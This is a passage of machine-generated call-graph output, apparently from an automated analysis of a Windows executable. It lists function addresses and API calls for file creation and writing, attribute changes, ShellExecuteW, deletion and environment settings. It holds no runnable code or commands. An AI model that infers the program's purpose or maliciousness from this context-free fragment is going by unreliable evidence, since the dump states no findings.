40738e 12531->12532 12533 4073d3 7 API calls 12532->12533 12534 4073bc 12533->12534 12534->12031 12536 40eb5e 3 API calls 12535->12536 12537 40e401 12536->12537 12537->12032 12539 404b48 12538->12539 12541 404b53 12538->12541 12540 402cb4 17 API calls 12539->12540 12540->12541 12541->11949 12543 4035c2 lstrcmpW 12542->12543 12544 401b33 12543->12544 12545 401b67 12544->12545 12546 40e589 3 API calls 12544->12546 12545->12055 12547 401b41 12546->12547 12548 40478e 7 API calls 12547->12548 12549 401b47 12548->12549 12549->12545 12550 4013e1 3 API calls 12549->12550 12550->12545 12552 40e640 12551->12552 13684 40e3a5 12552->13684 12554 405597 12554->12076 12556 40e457 3 API calls 12555->12556 12557 4018ae 12556->12557 13687 402434 12557->13687 12559 4018b9 12560 40478e 7 API calls 12559->12560 12564 4018c5 12560->12564 12561 40259c lstrlenW lstrlenW _wcsnicmp 12561->12564 12562 401907 _wtol 12562->12564 12564->12561 12564->12562 12566 40196f 12564->12566 13694 4036ff 12564->13694 13701 4036ba 12564->13701 12567 4019d0 12566->12567 12568 40197d 12566->12568 12571 40e522 3 API calls 12567->12571 12569 401983 12568->12569 12570 40199d 12568->12570 12572 40e589 3 API calls 12569->12572 12574 40e589 3 API calls 12570->12574 12573 4019d8 12571->12573 12575 401989 12572->12575 12576 40e6f7 3 API calls 12573->12576 12577 40199b 12574->12577 12578 40e6f7 3 API calls 12575->12578 12579 4019ce 12576->12579 12580 4035c2 lstrcmpW 12577->12580 12581 401992 12578->12581 12584 40e457 3 API calls 12579->12584 12582 4019b0 12580->12582 12583 40e6f7 3 API calls 12581->12583 12582->12579 12586 40e6f7 3 API calls 12582->12586 12583->12577 12585 4019eb 12584->12585 12587 403800 3 API calls 12585->12587 12588 4019c5 12586->12588 12589 4019f7 12587->12589 12590 40e6f7 3 API calls 12588->12590 12591 40e420 3 API calls 12589->12591 12590->12579 12592 401a02 12591->12592 12593 40478e 7 API calls 12592->12593 12594 401a0b 12593->12594 13708 401ca7 12594->13708 12597 401a2e 12599 40478e 7 API calls 12597->12599 12598 40e6f7 3 API calls 12598->12597 12600 401a37 12599->12600 13715 40e65a 12600->13715 12601 401ae0 13736 4024a7 12601->13736 12605 40e635 3 API calls 12607 401a60 12605->12607 12606 401b06 12606->12094 12608 40e615 3 API calls 12607->12608 12609 401a6d 12608->12609 12610 40e420 3 API calls 12609->12610 12611 401a7a 12610->12611 13719 401b98 12611->13719 12613 401aa0 12614 401ab7 12613->12614 12615 401aa7 12613->12615 12616 401ac0 GetLastError 12614->12616 12617 401acd 12614->12617 13733 401c79 12615->13733 12616->12617 12618 401ad8 12616->12618 12619 407280 33 API calls 12617->12619 12620 404b3f 17 API calls 12618->12620 12619->12618 12620->12601 12624 40e457 3 API calls 12623->12624 12626 404618 12624->12626 12625 40e589 3 API calls 12625->12626 12626->12625 12627 4013e1 3 API calls 12626->12627 12628 404698 12626->12628 12630 4035c2 lstrcmpW 12626->12630 12627->12626 12629 404607 4 API calls 12628->12629 12631 4046ce 12628->12631 12629->12631 12630->12626 12631->12078 12633 4042c6 12632->12633 12639 404422 12632->12639 12634 4042dc GetDriveTypeW 12633->12634 12633->12639 12635 404304 12634->12635 12634->12639 12636 402ac3 8 API calls 12635->12636 12637 404312 CreateFileW 12636->12637 12638 404339 12637->12638 12637->12639 12640 40e457 3 API calls 12638->12640 12639->12095 12641 404341 12640->12641 12642 40e589 3 API calls 12641->12642 12643 40434e 12642->12643 12644 40e6f7 3 API calls 12643->12644 12645 40435c 12644->12645 12646 40e6b9 3 API calls 12645->12646 12647 404368 12646->12647 12648 40e6f7 3 API calls 12647->12648 12649 404376 12648->12649 12650 40e6f7 3 API calls 12649->12650 12651 404383 12650->12651 12652 40e6b9 3 API calls 12651->12652 12653 40438f 12652->12653 12654 40e6f7 3 API calls 12653->12654 12655 40439c 12654->12655 12656 40e6f7 3 API calls 12655->12656 12657 4043a5 12656->12657 12658 40e6b9 3 API calls 12657->12658 12659 4043b1 12658->12659 12660 40e6f7 3 API calls 12659->12660 12661 4043ba 12660->12661 12662 404147 5 API calls 12661->12662 12663 4043cc WriteFile 12662->12663 12664 41a3c0 12663->12664 12665 4043ea CloseHandle 12664->12665 12666 4043f6 12665->12666 12667 40443b 12665->12667 12666->12667 12668 4043fe SetFileAttributesW ShellExecuteW 12666->12668 12669 402cb4 17 API calls 12667->12669 12668->12639 12669->12639 12671 41a382 12670->12671 12672 41a394 malloc 12671->12672 12673 404ec7 12672->12673 12674 41a387 _callnewh 12672->12674 12673->11925 12674->12672 12676 41a3a3 12674->12676 12675 41af57 12677 417e5f __CxxThrowException@8 RaiseException 12675->12677 12676->12675 12680 417e5f 12676->12680 12678 41af74 12677->12678 12681 417e7f RaiseException 12680->12681 12681->12675 12695 40eb39 12683->12695 12687 40e457 3 API calls 12686->12687 12688 40410f 12687->12688 12689 404140 12688->12689 12690 402f39 4 API calls 12688->12690 12689->12229 12691 404127 MultiByteToWideChar 12690->12691 12691->12689 12698 40e843 12692->12698 12694 40e6cb 12694->12229 12696 41a3c5 3 API calls 12695->12696 12697 40e36f 12696->12697 12697->12229 12699 40e856 12698->12699 12700 40e86b 12698->12700 12702 40ea2f 12699->12702 12700->12694 12703 40ea89 12702->12703 12704 40ea3f 12702->12704 12705 417e5f __CxxThrowException@8 RaiseException 12703->12705 12704->12703 12706 40ea47 12704->12706 12707 40ea9e 12705->12707 12708 41a3c5 3 API calls 12706->12708 12709 40ea5e 12708->12709 12709->12700 12711 403962 12710->12711 12717 4039a8 12710->12717 12712 4038cc CharUpperW 12711->12712 12713 4039b5 12711->12713 12711->12717 12712->12711 12718 4038cc 12713->12718 12716 4038cc CharUpperW 12716->12717 12717->12233 12719 4038d8 12718->12719 12720 4038de 12718->12720 12719->12720 12721 4038e9 CharUpperW 12719->12721 12720->12716 12721->12720 12723 40e98a 12722->12723 12724 40e9bd 12722->12724 12725 41a3c5 3 API calls 12723->12725 12726 417e5f __CxxThrowException@8 RaiseException 12724->12726 12728 40e9a1 12725->12728 12727 40e9d2 12726->12727 12728->12237 12730 4032f2 12729->12730 12731 4032e6 GetNativeSystemInfo 12729->12731 12730->12247 12731->12247 12733 401289 12732->12733 12734 40d64d 12732->12734 12738 40d216 12733->12738 12741 40d2ba SetFilePointer 12734->12741 12748 40d245 12738->12748 12742 40d2e8 12741->12742 12743 40d2de GetLastError 12741->12743 12744 40d46e 12742->12744 12743->12742 12745 40d477 12744->12745 12746 40d47b GetLastError 12744->12746 12745->12733 12747 40d487 12746->12747 12747->12733 12751 40d18d 12748->12751 12756 40d16e 12751->12756 12753 40d198 12754 40d19c CreateFileW 12753->12754 12755 40d1bd 12753->12755 12754->12755 12755->12252 12757 40d176 CloseHandle 12756->12757 12758 40d189 12756->12758 12759 40d182 12757->12759 12758->12753 12759->12753 12759->12758 12761 403a02 12760->12761 12766 40d63b 3 API calls 12761->12766 12762 403a14 lstrlenA lstrlenA 12764 403a4b _memcmp BuildCatchObjectHelperInternal 12762->12764 12763 4037b2 12763->12263 12763->12264 12764->12763 12790 40d5d5 12764->12790 12795 4024ca 12764->12795 12766->12762 12769 40e383 3 API calls 12768->12769 12784 403323 12769->12784 12770 40e457 RaiseException _callnewh malloc 12770->12784 12771 40e383 3 API calls 12771->12784 12772 40359f 12829 403f51 12772->12829 12774 40358d 12774->12265 12776 4040ff wcsncpy MultiByteToWideChar RaiseException _callnewh malloc 12776->12784 12777 40e522 RaiseException _callnewh malloc 12777->12784 12778 4024ca RaiseException _callnewh malloc 12778->12784 12779 403b58 5 API calls 12780 4034df lstrcmpW 12779->12780 12780->12784 12781 403513 lstrlenW wcsncmp 12781->12784 12784->12770 12784->12771 12784->12772 12784->12774 12784->12776 12784->12777 12784->12778 12784->12779 12784->12781 12785 40e589 3 API calls 12784->12785 12814 402d10 12784->12814 12818 402fbe 12784->12818 12822 402549 12784->12822 12785->12784 12787 40e489 12786->12787 12789 40e49c 12786->12789 12788 41a3c5 3 API calls 12787->12788 12787->12789 12788->12789 12789->12268 12799 40d297 12790->12799 12793 40d603 GetLastError 12794 40d5ff 12793->12794 12794->12764 12796 4024dd 12795->12796 12797 4024d8 12795->12797 12796->12764 12803 40e870 12797->12803 12802 40d26a ReadFile 12799->12802 12801 40d2b6 12801->12793 12801->12794 12802->12801 12806 40e9d3 12803->12806 12805 40e886 12805->12796 12807 40e9e3 12806->12807 12808 40ea19 12806->12808 12807->12808 12810 40e9eb 12807->12810 12809 417e5f __CxxThrowException@8 RaiseException 12808->12809 12811 40ea2e 12809->12811 12812 41a3c5 3 API calls 12810->12812 12813 40e9f4 12812->12813 12813->12805 12815 402d4a 12814->12815 12816 402d1e lstrcmpW 12814->12816 12815->12784 12817 402d35 12816->12817 12817->12815 12817->12816 12819 402fca 12818->12819 12820 402fd2 lstrcmpW 12819->12820 12821 402ff2 12819->12821 12820->12819 12820->12821 12821->12784 12841 41a382 12822->12841 12825 402565 12850 402576 12825->12850 12830 40e383 3 API calls 12829->12830 12833 403f61 12830->12833 12831 403f86 12832 4040ff 5 API calls 12831->12832 12834 403f98 12832->12834 12833->12831 12837 4024ca 3 API calls 12833->12837 12835 403fa6 12834->12835 12836 403fba 12834->12836 12838 407280 33 API calls 12835->12838 12839 407280 33 API calls 12836->12839 12837->12833 12840 403fb5 12838->12840 12839->12840 12840->12774 12842 41a394 malloc 12841->12842 12843 402556 12842->12843 12844 41a387 _callnewh 12842->12844 12843->12825 12853 402483 12843->12853 12844->12842 12845 41a3a3 12844->12845 12848 417e5f __CxxThrowException@8 RaiseException 12845->12848 12849 41af57 12845->12849 12846 417e5f __CxxThrowException@8 RaiseException 12847 41af74 12846->12847 12848->12849 12849->12846 12858 403fdc 12850->12858 12852 402571 12852->12784 12854 40e3ef 3 API calls 12853->12854 12855 402493 12854->12855 12856 40e3ef 3 API calls 12855->12856 12857 40249f 12856->12857 12857->12825 12859 403fe7 12858->12859 12861 404009 12858->12861 12860 41a3c5 3 API calls 12859->12860 12860->12861 12861->12852 12863 40e420 3 API calls 12862->12863 12864 401427 12863->12864 12865 40e6f7 3 API calls 12864->12865 12866 401434 12865->12866 12867 40145a 12866->12867 12869 4013e1 3 API calls 12866->12869 12868 40e6f7 3 API calls 12867->12868 12870 401467 12868->12870 12869->12866 12871 4016df 45 API calls 12870->12871 12872 40146f 12871->12872 12872->12280 12876 4016f6 12873->12876 12883 401722 12873->12883 12874 4016f9 lstrlenW 12875 403951 CharUpperW 12874->12875 12875->12876 12876->12874 12877 401729 12876->12877 12876->12883 12878 40e420 3 API calls 12877->12878 12881 401732 12878->12881 12884 404147 12881->12884 12882 40330e 41 API calls 12882->12883 12883->12280 12885 40e383 3 API calls 12884->12885 12886 404157 12885->12886 12887 40179a 12886->12887 12890 402eef 12886->12890 12887->12882 12889 404176 WideCharToMultiByte 12889->12887 12896 40e33a 12890->12896 12893 402f19 strncpy 12895 402f2d 12893->12895 12895->12889 12897 40eb39 3 API calls 12896->12897 12898 402f03 12897->12898 12898->12893 12899 40e92b 12898->12899 12900 40e961 12899->12900 12901 40e93e 12899->12901 12903 417e5f __CxxThrowException@8 RaiseException 12900->12903 12902 41a3c5 3 API calls 12901->12902 12905 40e947 12902->12905 12904 40e976 12903->12904 12905->12893 12907 404e0b 12906->12907 12918 404cf2 12907->12918 12911 404d99 12910->12911 12912 404cf2 _wtol 12911->12912 12913 404db8 12912->12913 12913->12310 12915 404dca 12914->12915 12916 404cf2 _wtol 12915->12916 12917 404de9 12916->12917 12917->12315 12919 404d13 12918->12919 12920 404d2d _wtol 12919->12920 12921 404d83 12919->12921 12920->12919 12921->12306 12923 409b3f __EH_prolog 12922->12923 12926 40a398 12923->12926 12925 409b91 12925->12336 12928 40a3ad 12926->12928 12927 40a3f6 12927->12925 12928->12927 12931 40d63b 3 API calls 12928->12931 12929 40a3d4 12929->12927 12932 40a126 12929->12932 12931->12929 12941 40f2a6 12932->12941 12934 40a154 12934->12927 12935 40a13e 12935->12934 12936 41a3c5 3 API calls 12935->12936 12937 40a17b BuildCatchObjectHelperInternal 12936->12937 12937->12934 12938 40a267 12937->12938 12940 40d5d5 2 API calls 12937->12940 12939 40d63b 3 API calls 12938->12939 12939->12934 12940->12937 12944 40f25c 12941->12944 12945 40f29f 12944->12945 12946 40f26e 12944->12946 12945->12935 12946->12945 12947 40d5d5 2 API calls 12946->12947 12947->12946 12949 41a3c5 3 API calls 12948->12949 12950 40eb82 12949->12950 12950->12346 12952 402d84 6 API calls 12951->12952 12953 404799 12952->12953 13028 403e67 12953->13028 12955 404757 12966 402d84 12955->12966 12957 404764 12977 403dac 12957->12977 12959 404771 13000 403cf1 12959->13000 12961 40477c 13023 403f22 12961->13023 12963 404782 12964 402d84 6 API calls 12963->12964 12965 404788 SetEnvironmentVariableW 12964->12965 12965->12350 12967 40e457 3 API calls 12966->12967 12968 402d94 12967->12968 12969 402f39 4 API calls 12968->12969 12970 402da5 ExpandEnvironmentStringsW 12969->12970 12971 402db1 12970->12971 12972 402de4 12970->12972 12973 402f39 4 API calls 12971->12973 12972->12957 12974 402dbe ExpandEnvironmentStringsW 12973->12974 12975 402dcf 12974->12975 12976 40e522 3 API calls 12975->12976 12976->12972 12978 40e457 3 API calls 12977->12978 12979 403dba 12978->12979 12980 40e522 3 API calls 12979->12980 12981 403dc5 12980->12981 12982 40e6f7 3 API calls 12981->12982 12983 403dd2 12982->12983 12984 40e420 3 API calls 12983->12984 12985 403ddf 12984->12985 13051 40ea9f 12985->13051 12987 403def 12988 40e522 3 API calls 12987->12988 12989 403e03 12988->12989 12990 40e6f7 3 API calls 12989->12990 12991 403e10 12990->12991 12992 40e420 3 API calls 12991->12992 12993 403e1d 12992->12993 12994 40ea9f 4 API calls 12993->12994 12995 403e2d 12994->12995 12996 40e420 3 API calls 12995->12996 12997 403e44 12996->12997 12998 40ea9f 4 API calls 12997->12998 12999 403e53 12998->12999 12999->12959 13001 40e457 3 API calls 13000->13001 13002 403cff 13001->13002 13003 40e522 3 API calls 13002->13003 13004 403d0a 13003->13004 13005 40e6f7 3 API calls 13004->13005 13006 403d17 13005->13006 13007 40e420 3 API calls 13006->13007 13008 403d24 13007->13008 13009 40ea9f 4 API calls 13008->13009 13010 403d34 13009->13010 13011 40e522 3 API calls 13010->13011 13012 403d48 13011->13012 13013 40e6f7 3 API calls 13012->13013 13014 403d55 13013->13014 13015 40e420 3 API calls 13014->13015 13016 403d62 13015->13016 13017 40ea9f 4 API calls 13016->13017 13018 403d72 13017->13018 13019 40e420 3 API calls 13018->13019 13020 403d89 13019->13020 13021 40ea9f 4 API calls 13020->13021 13022 403d98 13021->13022 13022->12961 13024 40e420 3 API calls 13023->13024 13025 403f35 13024->13025 13026 40ea9f 4 API calls 13025->13026 13027 403f46 13026->13027 13027->12963 13029 40e457 3 API calls 13028->13029 13030 403e75 13029->13030 13031 40e522 3 API calls 13030->13031 13032 403e80 13031->13032 13033 40e6f7 3 API calls 13032->13033 13034 403e8d 13033->13034 13035 40e420 3 API calls 13034->13035 13036 403e9a 13035->13036 13037 40ea9f 4 API calls 13036->13037 13038 403eaa 13037->13038 13039 40e522 3 API calls 13038->13039 13040 403ebe 13039->13040 13041 40e6f7 3 API calls 13040->13041 13042 403ecb 13041->13042 13043 40e420 3 API calls 13042->13043 13044 403ed8 13043->13044 13045 40ea9f 4 API calls 13044->13045 13046 403ee8 13045->13046 13047 40e420 3 API calls 13046->13047 13048 403eff 13047->13048 13049 40ea9f 4 API calls 13048->13049 13050 403f0e 13049->13050 13050->12955 13052 40eab2 13051->13052 13053 40eb03 13051->13053 13057 40e5ec 13052->13057 13053->12987 13055 40eabb 13055->13053 13060 40e89e 13055->13060 13058 40e60d 13057->13058 13059 40e5fd wcscmp 13057->13059 13058->13055 13059->13058 13061 40e8af 13060->13061 13063 40e8ba 13060->13063 13064 40e8db 13061->13064 13063->13055 13065 40e843 3 API calls 13064->13065 13066 40e8eb 13065->13066 13066->13063 13068 40e420 3 API calls 13067->13068 13069 402669 13068->13069 13070 402f39 4 API calls 13069->13070 13071 402674 13070->13071 13073 4026cd GetSystemTimeAsFileTime GetFileAttributesW 13071->13073 13079 402705 13071->13079 13109 4040b7 CreateDirectoryW 13071->13109 13074 4026e2 13073->13074 13077 4026ec 13073->13077 13115 40325a FindFirstFileW 13074->13115 13076 4040b7 4 API calls 13078 4026fc 13076->13078 13077->13076 13080 40270f 13077->13080 13078->13079 13083 40273b 13078->13083 13079->13080 13081 407280 33 API calls 13079->13081 13080->12384 13081->13080 13082 4040b7 4 API calls 13082->13083 13083->13080 13083->13082 13084 4027ab 13083->13084 13085 407280 33 API calls 13084->13085 13085->13080 13160 40239c 13086->13160 13089 401dc1 13091 401dd0 13089->13091 13092 401e03 13089->13092 13090 401d9e 13093 401db2 WaitForSingleObject 13090->13093 13165 405f27 13090->13165 13094 401def 13091->13094 13102 401ddf 13091->13102 13096 401e14 GetExitCodeThread 13092->13096 13098 401e26 13092->13098 13100 401dff 13092->13100 13093->13089 13099 407280 33 API calls 13094->13099 13096->13098 13097 401dac 13097->13093 13098->13100 13101 401e51 SetLastError 13098->13101 13098->13102 13099->13100 13100->12386 13101->13102 13102->13100 13103 407280 33 API calls 13102->13103 13103->13100 13105 40e457 3 API calls 13104->13105 13106 401ced 13105->13106 13107 40e457 3 API calls 13106->13107 13108 401cf9 13107->13108 13108->12389 13110 4040ca GetLastError 13109->13110 13112 4040f9 13109->13112 13111 4040e4 GetFileAttributesW 13110->13111 13114 4040d9 13110->13114 13111->13112 13111->13114 13112->13071 13113 4040da SetLastError 13113->13112 13114->13112 13114->13113 13116 403278 13115->13116 13117 40327c FindClose 13115->13117 13116->13077 13118 403299 13117->13118 13119 40328c SetLastError 13117->13119 13120 4032a2 13118->13120 13121 4032b2 CompareFileTime 13118->13121 13122 4032c6 13118->13122 13119->13077 13125 402d4d 13120->13125 13121->13120 13121->13122 13122->13077 13124 4032aa 13124->13077 13131 402cb4 FindFirstFileW 13125->13131 13127 402d58 13128 402d80 13127->13128 13129 402d5d GetLastError 13127->13129 13128->13124 13130 402d68 13129->13130 13130->13124 13132 402cd2 13131->13132 13133 402cd7 FindClose 13131->13133 13132->13127 13134 402d05 13133->13134 13135 402ce7 SetFileAttributesW 13133->13135 13140 402b9f 13134->13140 13136 402d01 13135->13136 13137 402cf6 DeleteFileW 13135->13137 13136->13127 13137->13127 13139 402d0d 13139->13127 13141 40e420 3 API calls 13140->13141 13142 402bb5 13141->13142 13143 40e6f7 3 API calls 13142->13143 13144 402bc2 FindFirstFileW 13143->13144 13145 402c7b SetCurrentDirectoryW SetFileAttributesW 13144->13145 13158 402bdf 13144->13158 13147 402ca5 13145->13147 13148 402c95 RemoveDirectoryW 13145->13148 13146 40e589 3 API calls 13146->13158 13147->13139 13148->13147 13149 402ca2 13148->13149 13149->13147 13150 4013e1 3 API calls 13150->13158 13151 40e6f7 3 API calls 13151->13158 13152 402c43 SetFileAttributesW 13152->13147 13154 402c51 DeleteFileW 13152->13154 13153 402c0c lstrcmpW 13155 402c22 lstrcmpW 13153->13155 13156 402c5e FindNextFileW 13153->13156 13154->13158 13155->13156 13155->13158 13157 402c74 FindClose 13156->13157 13156->13158 13157->13145 13158->13146 13158->13147 13158->13150 13158->13151 13158->13152 13158->13153 13158->13156 13159 402b9f 3 API calls 13158->13159 13159->13158 13161 40e589 3 API calls 13160->13161 13162 4023ad 13161->13162 13163 4013e1 3 API calls 13162->13163 13164 401d71 CreateThread 13163->13164 13164->13089 13164->13090 13170 401ecf 13164->13170 13166 405798 5 API calls 13165->13166 13167 405f51 13166->13167 13168 4073d3 7 API calls 13167->13168 13169 405f82 13168->13169 13169->13097 13171 401edb 13170->13171 13172 401eee 13170->13172 13171->13172 13173 401edd Sleep 13171->13173 13179 4089a8 13172->13179 13183 408a5d 13172->13183 13173->13171 13175 401f21 13176 401f18 EndDialog 13176->13175 13180 4089b2 13179->13180 13181 4089b8 13179->13181 13197 4079a8 13180->13197 13185 408a67 __EH_prolog 13183->13185 13184 41a382 3 API calls 13186 408b81 13184->13186 13185->13184 13191 401f03 13185->13191 13187 41a382 3 API calls 13186->13187 13195 408bd6 13187->13195 13188 408c7d 13190 4089a8 6 API calls 13188->13190 13189 4089a8 6 API calls 13189->13191 13190->13191 13191->13175 13191->13176 13194 408f9c 72 API calls 13194->13195 13195->13188 13195->13194 13196 408c34 13195->13196 13251 408fce 13195->13251 13254 407fbe 13195->13254 13196->13189 13215 40f50a 13197->13215 13199 4079b6 13223 407aa0 13199->13223 13201 407978 13202 4079a7 13201->13202 13205 414a48 13201->13205 13212 414e0a 13201->13212 13202->13181 13232 40c361 13205->13232 13210 40c361 VirtualFree 13211 414e15 13210->13211 13211->13202 13213 40c361 VirtualFree 13212->13213 13214 414e15 13213->13214 13214->13202 13216 40f51f 13215->13216 13217 40f519 13215->13217 13218 40f535 13216->13218 13245 40f40a WaitForSingleObject 13216->13245 13241 40f3b6 SetEvent 13217->13241 13218->13199 13221 40f52f 13246 40f3e3 13221->13246 13224 40f50a 5 API calls 13223->13224 13225 407aae 13224->13225 13226 40f3e3 2 API calls 13225->13226 13227 407ab7 13226->13227 13228 40f3e3 2 API calls 13227->13228 13229 407ac0 13228->13229 13230 40f3e3 2 API calls 13229->13230 13231 407ac9 13230->13231 13231->13201 13233 40c37a 13232->13233 13234 40c36a VirtualFree 13232->13234 13235 415c73 13233->13235 13234->13233 13238 40c332 13235->13238 13239 40c361 VirtualFree 13238->13239 13240 40c33d 13239->13240 13240->13210 13242 40f3c8 13241->13242 13243 40f3cc GetLastError 13241->13243 13242->13216 13243->13216 13245->13221 13247 40f402 13246->13247 13248 40f3ef CloseHandle 13246->13248 13247->13218 13248->13247 13249 40f3d2 GetLastError 13248->13249 13249->13218 13289 409107 13251->13289 13369 40a62e 13254->13369 13256 408007 13257 408017 13256->13257 13375 407ecd 13256->13375 13257->13195 13261 408054 13261->13257 13262 41a382 3 API calls 13261->13262 13264 4081d8 13261->13264 13274 4080fa 13262->13274 13263 4083ae 13265 41a382 3 API calls 13263->13265 13264->13257 13264->13263 13278 40772a 3 API calls 13264->13278 13395 414915 13264->13395 13431 407758 13264->13431 13266 4083db 13265->13266 13267 4083e7 13266->13267 13435 407817 13266->13435 13267->13257 13277 41a382 RaiseException _callnewh malloc 13267->13277 13285 408585 13267->13285 13288 40d63b 3 API calls 13267->13288 13438 407cfb 13267->13438 13268 4081bd 13416 407b9c 13268->13416 13274->13257 13274->13268 13391 40d058 13274->13391 13277->13267 13278->13264 13282 41a382 3 API calls 13283 4085de 13282->13283 13405 40c794 13283->13405 13401 40772a 13285->13401 13288->13267 13292 40910c 13289->13292 13290 408ff0 13290->13195 13292->13290 13294 409018 13292->13294 13298 4089e9 13292->13298 13295 409033 13294->13295 13302 401f28 13295->13302 13296 40907d 13296->13292 13299 4089ef 13298->13299 13359 408a14 13299->13359 13303 401f37 13302->13303 13304 401f41 13302->13304 13303->13296 13304->13303 13340 409822 13304->13340 13305 401f8b 13306 40e457 3 API calls 13305->13306 13315 402207 13305->13315 13308 401f9d 13306->13308 13307 40ee93 VariantClear 13307->13303 13309 40e589 3 API calls 13308->13309 13308->13315 13310 401fbd 13309->13310 13348 40e615 13310->13348 13313 40e589 3 API calls 13316 401fdb 13313->13316 13315->13307 13317 402090 GetLocalTime SystemTimeToFileTime 13316->13317 13318 402077 13316->13318 13337 40201a 13316->13337 13317->13318 13319 4020c6 13318->13319 13320 4020ae 13318->13320 13318->13337 13321 40325a 22 API calls 13319->13321 13322 402648 59 API calls 13320->13322 13323 4020cf 13321->13323 13322->13337 13324 4020da 13323->13324 13325 4021ee GetLastError 13323->13325 13326 41a382 3 API calls 13324->13326 13324->13337 13325->13337 13327 4020ea 13326->13327 13351 40d1c2 13327->13351 13330 402135 GetLastError 13331 40e3ef 3 API calls 13330->13331 13332 40214a 13331->13332 13333 402648 59 API calls 13332->13333 13332->13337 13334 40217b 13333->13334 13335 40d1c2 2 API calls 13334->13335 13334->13337 13336 4021a3 13335->13336 13336->13337 13338 4021a7 GetLastError 13336->13338 13354 40ee93 13337->13354 13338->13337 13341 40ef29 VariantClear 13340->13341 13342 409833 13341->13342 13343 40984e 13342->13343 13346 409942 13342->13346 13344 40a2bb SysAllocStringLen VariantClear 13343->13344 13347 40985d 13343->13347 13344->13347 13345 409a55 RaiseException 13345->13347 13346->13345 13346->13347 13347->13305 13349 40e3a5 RaiseException _callnewh malloc 13348->13349 13350 401fce 13349->13350 13350->13313 13352 40d227 CloseHandle CreateFileW 13351->13352 13353 40212d 13352->13353 13353->13330 13353->13337 13355 40ee99 13354->13355 13356 40ee9c 13354->13356 13355->13315 13357 40ef29 VariantClear 13356->13357 13358 40eea2 13357->13358 13358->13315 13360 408a21 13359->13360 13363 4023bb 13360->13363 13364 4023d1 13363->13364 13365 4023c5 13363->13365 13366 4023ea 13364->13366 13367 40d367 SetFileTime 13364->13367 13365->13292 13366->13365 13368 402401 SetFileAttributesW 13366->13368 13367->13366 13368->13365 13447 40a40b 13369->13447 13372 40a666 13372->13256 13373 417e5f __CxxThrowException@8 RaiseException 13374 40a67f 13373->13374 13376 407ede 13375->13376 13517 407e89 13376->13517 13381 407e89 3 API calls 13382 407f42 13381->13382 13383 407e45 3 API calls 13382->13383 13384 407f9d 13383->13384 13385 40c4a0 13384->13385 13388 40c545 13385->13388 13389 40c4c5 13385->13389 13386 40c522 13386->13388 13525 40c55a 13386->13525 13388->13261 13389->13386 13389->13388 13390 402576 RaiseException _callnewh malloc 13389->13390 13390->13389 13392 40d07b 13391->13392 13393 41a382 3 API calls 13392->13393 13394 40d093 13392->13394 13393->13394 13394->13274 13396 414925 13395->13396 13400 41491e 13395->13400 13396->13400 13532 414a7b 13396->13532 13400->13264 13402 40774e 13401->13402 13403 40773a 13401->13403 13402->13257 13402->13283 13443 40cbe1 13402->13443 13404 41a3c5 3 API calls 13403->13404 13404->13402 13550 40c96d 13405->13550 13407 40c7d5 13408 40c7f1 13407->13408 13576 40f4fb 13407->13576 13556 40c690 13408->13556 13411 40c7aa 13411->13407 13413 40c823 13411->13413 13564 40f49f 13411->13564 13413->13257 13414 40c802 13414->13413 13579 40f40a WaitForSingleObject 13414->13579 13617 407ace 13416->13617 13418 407bac 13419 407b35 3 API calls 13418->13419 13420 407bb8 13419->13420 13421 407ace 3 API calls 13420->13421 13422 407bc4 13421->13422 13423 407ace 3 API calls 13422->13423 13424 407bd6 13423->13424 13425 407ace 3 API calls 13424->13425 13426 407be2 13425->13426 13427 407b35 13426->13427 13428 407b73 13427->13428 13429 407b43 13427->13429 13428->13264 13429->13428 13430 41a3c5 3 API calls 13429->13430 13430->13428 13432 407768 13431->13432 13433 40777c 13431->13433 13434 41a3c5 3 API calls 13432->13434 13433->13264 13434->13433 13621 40f32d 13435->13621 13439 41a382 3 API calls 13438->13439 13440 407d06 13439->13440 13441 402576 3 API calls 13440->13441 13442 407d1c 13441->13442 13442->13267 13445 40cc01 13443->13445 13446 4085d3 13443->13446 13445->13446 13626 40cc25 13445->13626 13446->13282 13446->13283 13474 40b35f 13447->13474 13449 40a41e 13468 40a5e3 13449->13468 13479 40c190 13449->13479 13453 40a572 13497 40c14d 13453->13497 13459 40a5b9 13459->13468 13501 40c10a 13459->13501 13463 40b35f RaiseException 13465 40a585 13463->13465 13464 40a5db 13466 40a608 13464->13466 13464->13468 13465->13459 13465->13463 13467 40a606 13466->13467 13469 40b35f RaiseException 13466->13469 13467->13372 13467->13373 13468->13467 13505 40c29b 13468->13505 13469->13466 13470 40b35f RaiseException 13471 40a432 13470->13471 13471->13453 13471->13468 13471->13470 13483 40a924 13471->13483 13488 409e73 13471->13488 13492 40a93c 13471->13492 13508 40b375 13474->13508 13477 417e5f __CxxThrowException@8 RaiseException 13478 40c2ad 13477->13478 13480 40c1c8 13479->13480 13481 40c19f 13479->13481 13480->13471 13481->13480 13482 41a3c5 3 API calls 13481->13482 13482->13480 13484 40a932 13483->13484 13485 40c283 13483->13485 13484->13471 13485->13471 13486 417e5f __CxxThrowException@8 RaiseException 13485->13486 13487 40c29a 13486->13487 13489 409e91 13488->13489 13490 409e82 13488->13490 13489->13471 13490->13489 13491 41a3c5 3 API calls 13490->13491 13491->13489 13493 40a94a 13492->13493 13494 40a954 13492->13494 13493->13494 13513 40c283 13493->13513 13494->13471 13496 40a974 13498 40c15c 13497->13498 13500 40c179 13497->13500 13499 41a3c5 3 API calls 13498->13499 13498->13500 13499->13500 13500->13465 13502 40c119 13501->13502 13504 40c136 13501->13504 13503 41a3c5 3 API calls 13502->13503 13502->13504 13503->13504 13504->13464 13506 417e5f __CxxThrowException@8 RaiseException 13505->13506 13507 40c2ad 13506->13507 13509 40b395 13508->13509 13510 40b364 13509->13510 13511 40c283 RaiseException 13509->13511 13510->13449 13510->13477 13512 40b3b3 13511->13512 13513->13496 13514 40c288 13513->13514 13515 417e5f __CxxThrowException@8 RaiseException 13514->13515 13516 40c29a 13515->13516 13518 407ec0 13517->13518 13519 407e9c 13517->13519 13521 407e45 13518->13521 13520 41a3c5 3 API calls 13519->13520 13520->13518 13522 407e7c 13521->13522 13523 407e58 13521->13523 13522->13381 13524 41a3c5 3 API calls 13523->13524 13524->13522 13528 409fae 13525->13528 13527 40c56b ___scrt_fastfail 13527->13388 13529 409fc1 13528->13529 13531 409fd5 13528->13531 13530 41a3c5 3 API calls 13529->13530 13530->13531 13531->13527 13533 414a8c 13532->13533 13534 41495a 13533->13534 13535 414e0a VirtualFree 13533->13535 13534->13400 13538 4157fc 13534->13538 13536 414a96 13535->13536 13544 40c340 13536->13544 13539 41580d 13538->13539 13540 41582d 13539->13540 13541 415c73 VirtualFree 13539->13541 13540->13400 13542 